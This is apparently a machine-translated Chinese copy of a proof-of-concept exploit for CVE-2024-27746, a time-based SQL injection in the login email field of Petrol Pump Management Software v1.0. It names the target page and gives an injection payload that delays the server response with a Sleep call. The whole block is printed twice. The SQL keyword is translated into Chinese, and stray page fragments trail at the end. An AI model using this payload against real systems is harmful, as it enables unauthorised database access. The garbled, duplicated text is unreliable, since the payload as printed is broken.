#利用标题:汽油泵管理软件v.1.0 -SQL注入
#日期: 01-03-2024
#利用作者: Shubham Pandey
#供应商homepage: https://www.sourcecodester.com
#软件link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-free-download.html
#版本: 1.0
#在: Windows,Linux上测试
#CVE : CVE-2024-27746
#描述:汽油泵管理软件中的SQL注入漏洞v.1.0允许攻击者通过精心设计的有效负载执行任意代码到index.php组件中的电子邮件地址参数。
#POC:
1。在这里我们转到: http://localhost/fuelflow/index.php
2。现在使用用户名登录: [email protected]';选择Sleep(10)#和
密码=测试
3.页面将加载10秒,因为基于时间的SQL注入
#参考:
#日期: 01-03-2024
#利用作者: Shubham Pandey
#供应商homepage: https://www.sourcecodester.com
#软件link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-free-download.html
#版本: 1.0
#在: Windows,Linux上测试
#CVE : CVE-2024-27746
#描述:汽油泵管理软件中的SQL注入漏洞v.1.0允许攻击者通过精心设计的有效负载执行任意代码到index.php组件中的电子邮件地址参数。
#POC:
1。在这里我们转到: http://localhost/fuelflow/index.php
2。现在使用用户名登录: [email protected]';选择Sleep(10)#和
密码=测试
3.页面将加载10秒,因为基于时间的SQL注入
#参考:
正在加载...
github.com
